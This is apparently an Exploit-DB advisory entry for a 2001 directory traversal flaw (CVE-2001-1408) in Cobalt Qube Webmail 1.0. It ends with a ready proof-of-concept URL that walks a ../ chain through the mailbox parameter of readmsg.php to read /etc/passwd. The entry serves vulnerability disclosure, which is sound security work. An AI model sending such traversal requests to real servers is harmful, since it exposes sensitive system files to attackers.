cobalt qube webmail 1.0 - Directory Traversal Vulnerability

2001-07-05T00:00:00
ID EDB-ID:20995
Type exploitdb
Reporter kf
Modified 2001-07-05T00:00:00

Description

Cobalt Qube Webmail 1.0 Directory Traversal Vulnerability. CVE-2001-1408. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/2987/info

Cobalt Qube is an fully-featured network "server appliance".
It includes pre-installed tools and applications and can be put online with very little configuration.

A vulnerability in Cobalt Qube's webmail implementation allows remote attackers to traverse directories. Malformed HTTP requests can be crafted to display sensitive information about the host. 

http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1